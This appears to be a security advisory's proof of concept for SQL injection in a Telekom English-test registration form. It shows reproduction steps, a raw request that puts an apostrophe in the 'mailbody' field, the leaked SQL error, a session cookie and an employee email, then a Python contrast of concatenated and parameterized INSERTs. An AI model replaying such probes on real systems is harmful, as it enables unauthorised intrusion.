Proof of Concept (PoC):
=======================
The SQL injection vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction. To demonstrate or reproduce:

a) The attacker should visit the main page to take the test: https://gt.telekom.de/englishtest2004eng/html/intro.htm
b) The attacker should keep clicking "Next" until reaching the final step of the test, the "Registration for the Fitness Check" page.
c) The registration form has many fields. Fill in the vulnerable fields and click the "Register" button.
d) The attacker should then intercept the request and change the "mailbody" parameter to a single apostrophe, which will trigger the SQL error.
e) After forwarding the request, the SQL error from the INSERT statement is echoed back in the page.

The POST request that was used to reproduce this is:

POST /englishtest2004/test.asp HTTP/1.1
Host: gt.telekom.de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://gt.telekom.de/englishtest2004/html/intro_11.htm
Cookie: _ga=GA1.2.1524944686.1388633141; ASPSESSIONIDQAQRBTRB=PJJNFNFCCPEDGGLMFOGEGNGK
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 483

response=/englishtest2004/html/starttest.htm&to=hans-juergen.grunwald@telekom.de&from=&subject=Fokus_Sprachen_&_Seminare-Login&smtphost=localhost&mailbody='&NAME=">&VORNAME=">&PLZ=">&EMAIL=">&TELEFON=">&ORT=">

After forwarding the POST request, a response similar to this will be received from the server:

HTTP/1.1 500 Internal Server Error
Date: Thu, 02 Jan 2014 03:49:47 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Content-Length: 572
Content-Type: text/html
Cache-control: private
insert into Sprachtest(Name, Vorname,PersNr,Telefon,Fax, Ergebnis)VALUES ('">','">','','">

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Kein schließendes Anführungszeichen nach der Zeichenfolge '');'.

/englishtest2004/test.asp, line 23
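As an added illustration (not the advisory's or the site's own code), the string-built INSERT pattern behind the echoed error is shown beside its parameterized form, in Python with an in-memory SQLite database standing in for the SQL Server backend. The column names come from the error message above; the column types and the wrapper functions are assumed for the example.

```python
import sqlite3

# Table layout taken from the echoed INSERT statement; column types are assumed.
SCHEMA = ("CREATE TABLE Sprachtest(Name TEXT, Vorname TEXT, PersNr TEXT, "
          "Telefon TEXT, Fax TEXT, Ergebnis TEXT)")


def insert_concatenated(conn, name, vorname, persnr, telefon, fax, ergebnis):
    """Vulnerable pattern: form values are pasted straight into the SQL text,
    so a single apostrophe in any field breaks the statement (and a crafted
    value could change it)."""
    sql = ("insert into Sprachtest(Name, Vorname,PersNr,Telefon,Fax, Ergebnis)"
           f"VALUES ('{name}','{vorname}','{persnr}','{telefon}','{fax}','{ergebnis}');")
    conn.execute(sql)


def insert_parameterized(conn, name, vorname, persnr, telefon, fax, ergebnis):
    """Fix: placeholders keep the values out of the query text, so the driver
    stores them verbatim regardless of quotes."""
    conn.execute(
        "insert into Sprachtest(Name, Vorname, PersNr, Telefon, Fax, Ergebnis) "
        "VALUES (?, ?, ?, ?, ?, ?)",
        (name, vorname, persnr, telefon, fax, ergebnis),
    )


def demo(value="'"):
    """Feed the same value (default: the advisory's lone apostrophe) to both
    variants. Returns (concatenated_insert_failed, value_stored_by_fixed_insert)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    concat_failed = False
    try:
        insert_concatenated(conn, value, "", "", "", "", "")
    except sqlite3.OperationalError:
        # Unterminated string literal: the SQLite counterpart of the ODBC
        # 80040e14 "no closing quotation mark" error echoed by test.asp.
        concat_failed = True
    insert_parameterized(conn, value, "", "", "", "", "")
    stored = conn.execute("SELECT Name FROM Sprachtest").fetchone()[0]
    return concat_failed, stored


if __name__ == "__main__":
    print(demo())          # (True, "'")
    print(demo("Hans"))    # (False, 'Hans')
```

The apostrophe input fails only in the concatenated variant; the parameterized INSERT stores it unchanged, and ordinary input behaves the same in both.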